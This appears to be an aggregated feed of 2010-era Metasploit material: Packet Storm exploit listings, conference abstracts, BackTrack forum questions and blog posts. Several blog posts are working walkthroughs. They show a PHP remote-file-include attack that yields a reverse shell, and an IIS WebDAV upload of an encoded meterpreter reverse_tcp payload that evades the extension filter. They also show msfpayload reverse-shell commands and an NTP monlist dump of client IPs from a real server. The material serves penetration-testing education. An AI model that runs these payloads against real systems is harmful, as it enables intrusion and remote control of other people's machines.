The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
-
18:10
»
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
18:10
»
Packet Storm Security Recent Files
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
18:10
»
Packet Storm Security Misc. Files
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
-
9:29
»
Packet Storm Security Exploits
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
9:29
»
Packet Storm Security Recent Files
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
9:29
»
Packet Storm Security Misc. Files
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
-
22:17
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This Metasploit module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.
-
-
1:01
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
23:28
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
22:01
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
20:45
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
16:07
»
Packet Storm Security Recent Files
Whitepaper called Creating Windows Exploits with the Metasploit Framework, or Criar Exploits Para o Windows com a Ajuda da Metasploit Framework. Written in Portuguese.
-
-
19:41
»
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs, if I specify that I want xml output it wont produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metaspolit 3.4.2-dev and nmap 5.35DC1.
-
-
16:47
»
Carnal0wnage
Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.
Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.
I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.
Looks like this when it runs...
msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
you can then check out the folder with the results
code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
-
-
16:01
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
-
16:01
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
-
-
10:41
»
remote-exploit & backtrack
Hallo ich bafasse mich seit kurzem mit metasploit. Habe dazu mein Ubuntu Linux mit metasploit ausgestattet und in einer VM ein Windows Home XP SP2. Habe dazu mit msfpayload ein file erstellt:
Code:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.178.50 V > /tmp/testfile.bas
dieses file versuche ich dann in das Wordfile zu integrieren, doch sobald ich mit dem importierten Code speicher will bekomme ich immer die Meldung, dass ich zu wenig speicher hätte.
Hat jemand eine Idee woran das liegen könnte? Danke schon mal für die Hilfe.
Danke schon mal
-
-
6:46
»
remote-exploit & backtrack
Hi,
ich habe BackTrack 4 in einer VM laufen. Wollte mich mal ein wenig mit Metasploit befassen, doch beim updaten triff immer ein Fehler auf:
Code:
root@bt:/pentest/exploits/exploitdb# msfupdate
Updating Metasploit from metasploit.com/svn/framework3/trunk...
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: cleaning up the SVN directory and retrying...
svn: In directory '.'
svn: Error processing command 'modify-wcprop' in '.'
svn: 'HACKING' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: please check connectivity to the following URL:
metasploit.com/svn/framework3/trunk
root@bt:/pentest/exploits/exploitdb#
Hat jemand eine Idee was das sein kann? Internet verbindung besteht aber.
Danke schon mal
-
-
8:50
»
remote-exploit & backtrack
hi all,
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 569 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9903 updated today (2010.07.21)
my bt 4 final new metasploit java GUI [Exploits,Auxillary,Payload (Menu) not working please help me ..........
thks for all
-
-
22:02
»
Packet Storm Security Exploits
USBsploit is a proof of concept for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can also be used with the original Metasploit Framework.
-
-
20:46
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
10:41
»
SecDocs
Authors:
Christian Papathanasiou Tags:
web server exploiting JBoss Event:
Black Hat EU 2010 Abstract: JBoss Application Server is the open source implementation of the Java EE suite of services. It's easy-to-use server architecture and high flexibility makes JBoss the ideal choice for users just starting out with J2EE, as well as senior architects looking for a customizable middleware platform. The pervasiveness of JBoss in enterprise JSP deployments is second to none meaning there is an abundance of targets both for the blackhat or the pentester alike. JBoss is usually invoked as root/SYSTEM meaning that any potential exploitation usually results in immediate super user privileges. A tool has been developed that is able to compromise an unprotected JBoss instance. The current state of the art in published literature involves having the JBoss instance connect back to the attacker to obtain a war file that is subsequently deployed. The tool that will be presented at Black Hat does this in-situ and ultimately uploads a Metasploit payload resulting in interactive command execution on the JBoss instance. On Windows platforms, through the Metasploit framework a fully interactive reverse VNC shell can also be obtained and shall be demonstrated. Depending on the platform that has been exploited and the level of access obtained, the tool is able to deploy the Metasploit payload as a persistent backdoor in conjunction with the Metasploit framework’s antivirus evasion techniques. Due to the cross platform nature of the Java language, we are able to compromise JBoss instances running on Linux, MacOSX and Windows.
-
-
2:43
»
Packet Storm Security Recent Files
This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
-
2:43
»
Packet Storm Security Exploits
This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
-
-
22:48
»
remote-exploit & backtrack
Quote:
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-][*] Usage: db_create <user:pass>@<host:port>/<database>[*] Examples:[*] db_create user@metasploit3[*] db_create user:pass@192.168.0.2/metasploit3[*] db_create user:pass@192.168.0.2:1500/metasploit3
|
I got this error ,please give any idea to fix it,thanks
-
-
21:00
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
4:20
»
SecDocs
Authors:
H.D. Moore Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: In 2008 Metasploit expanded from a community-run project to a corporate product managed by Rapid7. This talk focuses on the transition, the lessons learned during the acquisition process, the challenges of maintaining a community, and the latest improvements to the Metasploit Framework. The points covered in this talk are valuable for anyone building an open-source product, contemplating the purchase of one, or considering using an open source product to build a commercial application.
-
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
-
21:04
»
SecDocs
Authors:
James Lee Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: Sometimes you need to choose your exploits precisely and be careful about the packets you write to the wire. Sometimes you just want to type a command, go get some coffee, and come back to a pile of shells. This talk will cover the means that the Metasploit Framework provides for accomplishing both of these goals, including many advancements from my talk at Black Hat USA in the realm of client-side exploitation.
-
-
19:19
»
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like
Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
-
10:01
»
Packet Storm Security Recent Files
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
-
10:00
»
Packet Storm Security Exploits
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
-
-
7:20
»
Carnal0wnage
intro..webdav stuff...lazy...
To get yourself a test environment you can follow
this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.
metasploit has a few modules to test for webDAV presence.
webdav_scanner:
msf auxiliary(webdav_scanner) > run
[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run
[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or if you have the path wrong
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run
[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.
If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(
Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.
So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
upload it and rename it
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.
more info here:
http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.htmlResources:
cadaver:
http://www.webdav.org/cadaver/DAVtest:
http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.htmlRyan Linn's port of DAVtest to metasploit:
http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
-
-
16:33
»
Packet Storm Security Recent Files
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
-
16:33
»
Packet Storm Security Exploits
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
-
0:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in WM Downloader version 3.0.0.9. By creating a specially crafted .pls file, an attacker may be able to execute arbitrary code.
-
-
19:12
»
Carnal0wnage
@hdmoore released a
new auxiliary module a few days ago that went along with his NTP research he has been doing.
msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com
RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info
Name: NTP Monitor List Scanner
Version: 8432
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
RHOSTS time.euro.apple.com yes The target address range or CIDR identifier
RPORT 123 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
Obtain the list of recent clients from an NTP server
msf auxiliary(ntp_monlist) >
And when you run the module, it looks a bit like this:
msf auxiliary(ntp_monlist) > run
[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >
Other neat shiz...
Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.
http://www.sensepost.com/blog/4552.htmlSome quick research into NTP(from ww.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program eg. 'ntpdc target.ntp.server'. Some of these commands include:
- listpeers - List the peers(NTP servers) for the time server
- showpeer - Give time keeping info about a specific peer time server
- peers - List peers and some basic time keeping info
- sysstats - Info regarding ntp daemon itself
$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126,
refid=17.72.133.54, reftime=cf648929.538400d4 Mon, Apr 5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c Mon, Apr 5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0
$ ntpdc -c peers time.euro.apple.com
remote local st poll reach delay offset disp
=======================================================================
*time1.euro.appl 17.72.255.11 1 128 377 0.00069 0.000155 0.07887
=time2.euro.appl 17.72.255.11 1 128 377 0.00061 0.000177 0.08919
=17.254.0.49 17.72.255.11 1 128 377 0.14996 0.000237 0.06696
=TrueTime.asia.a 17.72.255.11 1 128 377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11 2 128 0 0.17369 0.007904 3.99217
+time4.euro.appl 17.72.255.11 2 32 376 0.00015 -0.000151 0.04303
$ ntpdc -c listpeers time.euro.apple.com
client time1.euro.apple.com
client time2.euro.apple.com
client 17.254.0.49
client TrueTime.asia.apple.com
client A17-106-100-13.apple.com
sym_active time4.euro.apple.com
Of course if you just want to do the monlist yourself you can...
$ ntpdc -c monlist time.euro.apple.com
remote address port local address count m ver code avgint lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12 5 3 4 0 0 0
static-86-51-114-108.m 316 17.72.255.12 25 3 4 0 0 0
207-38-154-68.c3-0.ave 40311 17.72.255.12 7 3 4 0 0 0
62-177-171-130.dsl.bbe 501 17.72.255.12 1 3 4 0 0 0
bb6a37ee.virtua.com.br 123 17.72.255.12 1 3 4 0 0 0
p4FC7545E.dip.t-dialin 123 17.72.255.12 1 3 4 0 0 0
--SNIP--
Still Interested?
http://www.ntp.org/documentation.html
-
4:20
»
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with Port forwarding not being enabled.
I know how to forward ports, type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure, however my only unsurity is, officly i have two different Ip's between my primary OS machine and my VM machine when I switch onto backtrack, example my OS ip is 192.168.xx.xx and my BT IP is 10.0.2.xx so when i Type 192.168.xx.x into my primary OS browser and forward ports will the changes apply when I boot my Backtrack also, or is a different process required for that?Hope you can provide some clarity.
-
2:02
»
remote-exploit & backtrack
Hey all ... I've been experimenting with backtrack and metasploit for the past few days now, and I've succesfully managed to penetrate an Windows XP SP0 system using metasploit ... However, when I use the autopwn method in metasploit for scan an ubuntu 7.10 system, no sessions are automatically created, meaning no vulnerabilities were found .. Is this correct ? Are there no exploits in backtrack/metasploit for linux based OSes .. ?
Also, is metasploit's autopwn function a good way of scanning a network for vulnerable systems ?
-
-
14:25
»
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. I case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
-
-
17:47
»
remote-exploit & backtrack
Hi
To me, some metasploit auxilliary/modules of oracle such as oracle_login, dbms_export_extension don't work any more.
The warnings are such as "OCI" error (ruby-oci8). Even though I've successfully installed it in new fresh Ubuntu ruby, I can't still run oracle modules
According to my knowledge, BT4 has already had ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
-
-
5:33
»
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError [-] Call stack:
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in
`load_missing_constant'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in
`const_missing_with_dependencies'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in
`const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'[*] Auxiliary module execution completed
-----
I have tried the below recommendation for Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.
[1]Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
ruby186-27_rc2.exe
[3]install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
-
1:32
»
remote-exploit & backtrack
Ciao ! mi chiedevo se è possibile usare metasploit, netcat e altri strumenti, quando si è connesi a internet con una internetkey? cambia qualcosa?
-
-
18:06
»
remote-exploit & backtrack
For the last few weeks i've been playing with metasploit ...
Ive had fun hacking an old server using the old net_api overflow on xp sp 2
I just read the metasploit blog about the new adobe_libtiff exploit
i used the payload
windows/meterpreter/reverse_tcp
(is this right ?)
I have the PDF on the target machine it works A ok and connects back to my machine on xxx.xxx.xxx.3:1133 my question is ....
how do i go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby ?
i've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing ?
^^^ do i need to run this as a bg session/job ?
any suggestions please
& please dont flame me
-
-
11:38
»
Carnal0wnage
Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
